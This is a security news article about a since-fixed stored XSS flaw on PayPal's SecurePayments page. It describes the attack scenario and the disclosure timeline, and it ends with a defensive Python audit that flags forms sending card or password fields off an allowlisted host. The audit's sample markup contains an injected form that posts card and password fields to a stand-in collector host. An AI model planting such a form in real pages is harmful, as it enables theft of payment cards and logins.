
PayPal critical flaw allows attackers to steal all your funds

The expert Ebrahim Hegazy discovered a critical stored XSS vulnerability in PayPal that could be used to steal users' credit cards in cleartext format.

The popular security expert Ebrahim Hegazy (@Zigoo0) has discovered a critical stored XSS vulnerability in “https://Securepayments.Paypal.com” that could be exploited by attackers to steal PayPal users' credit card and login credentials … and more! The PayPal SecurePayments domain is used by PayPal users to make secure payments when purchasing from any shopping site. This secure payments page requires PayPal users to fill in some forms that include their credit card number, CVV2, expiry date and more. This information is necessary to finalize the payment and purchase the chosen products via their PayPal account. The submitted data is processed through an encrypted channel (HTTPS), so attackers won’t be able to sniff/steal such data.

“I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content. An attacker can provide his own HTML forms to the user to fill in and send the users' data back to the attacker’s server in clear text format, and then use this information to purchase anything on behalf of users or even transfer the users' funds to his own account!” wrote the expert in a blog post.

 

What are the attack scenarios?

Ebrahim explained that the worst attack scenario is:

  • The attacker sets up a shopping site or hacks into any shopping site and alters the “CheckOut” button with the PayPal vulnerability.
  • A PayPal user browses the malformed shopping site, chooses some products, and clicks the “CheckOut” button to pay with their PayPal account.
  • The user gets redirected to https://Securepayments.Paypal.com/ to fill in the required credit card information to complete the purchase order. The price of the products to be paid is included in the same page and, as we know, the attacker now controls this page!
  • Now, when the PayPal user clicks the Submit Payment button, instead of paying, let’s say, “100$”, YOU WILL PAY THE ATTACKER WHATEVER AMOUNT THE ATTACKER DECIDES!!

The expert published a video PoC that shows how an attacker exploits the vulnerability to steal the user's credit card and login credentials.

The expert ethically reported the flaw to PayPal, which promptly fixed it. This is the timeline of the bug:

  • Vulnerability Discovery: 19/Jun/15 2:27 AM
  • Vulnerability Reported: 19/Jun/15 7:10 AM
  • Remediation Notification: Aug 25, 2015 at 5:44 AM

Thanks to the PayPal Security team for the good coordination and the fast responses to emails.
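The impact described above depends on an injected form sending card and login fields to a server outside the payment domain. As an added example (not code from the article, the researcher or PayPal), the following defensive audit parses a rendered payment page and reports any form that submits sensitive fields anywhere other than an allowlisted HTTPS host; the allowlist, the field-name hints and the sample markup are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

ALLOWED_HOSTS = {"securepayments.paypal.com"}  # assumption: only trusted payment host
SENSITIVE = ("card", "cvv", "cvc", "expir", "pass")  # assumption: field-name hints

class FormAudit(HTMLParser):
    """Record each <form>, every URL it can submit to, and its sensitive fields."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.forms, self.current = page_url, [], None

    def _resolve(self, value):
        return urljoin(self.page_url, (value or "").strip())  # empty action = page URL

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.current = {"targets": {self._resolve(a.get("action"))}, "fields": []}
            self.forms.append(self.current)
        elif tag in ("input", "button") and self.current is not None:
            if a.get("formaction"):  # a submit control can override the action
                self.current["targets"].add(self._resolve(a["formaction"]))
            name = (a.get("name") or "").lower()
            is_pw = (a.get("type") or "").lower() == "password"
            if is_pw or any(hint in name for hint in SENSITIVE):
                self.current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self.current = None

def find_exfil_forms(html, page_url):
    """Return (target, fields) for forms sending sensitive fields off the allowlist."""
    audit = FormAudit(page_url)
    audit.feed(html)
    findings = []
    for form in audit.forms:
        for target in sorted(form["targets"]):
            url = urlsplit(target)
            trusted = url.scheme == "https" and url.hostname in ALLOWED_HOSTS
            if form["fields"] and not trusted:
                findings.append((target, form["fields"]))
    return findings

# Constructed sample: one legitimate form and one injected look-alike.
SAMPLE = """<form action="/checkout" method="post"><input name="card_number"></form>
<form action="//collector.example/c"><input name="card_number">
<input type="password" name="login_pw"></form>"""
```

This is a static check on markup, so it does not see forms that a script builds at runtime; a Content-Security-Policy `form-action` directive enforces the same allowlist in the browser.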

Pierluigi Paganini

(Security Affairs – hacking, PayPal)
